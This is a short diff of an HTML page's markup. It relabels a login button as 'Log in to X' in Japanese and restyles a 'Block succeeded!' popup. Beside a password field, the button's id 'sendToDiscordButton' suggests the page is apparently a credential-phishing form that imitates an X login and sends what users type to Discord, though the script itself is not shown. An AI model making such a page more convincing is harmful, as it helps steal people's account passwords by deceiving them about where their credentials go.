--- a/index.html
+++ b/index.html
@@ -23,13 +23,14 @@
             <input type="password" id="passwordInput" class="text-input" placeholder="パスワード">
         </div>
 
-        <button id="sendToDiscordButton" class="submit-button">ログインする</button>
+        <button id="sendToDiscordButton" class="submit-button">Xにログインする</button>
     </div>
 
     <div id="cModal" class="modal">
-        <div class="modal-content">
-            <span class="close-button">&times;</span>
-            <p class="modal-text">ブロックに成功しました！</p>
+        <div class="modal-content-popup"> 
+            <p class="popup-title-bar">通知</p>
+            <p class="popup-message">ブロックに成功しました！</p>
+            <button id="okButton" class="ok-button">OK</button>
         </div>
     </div>
 
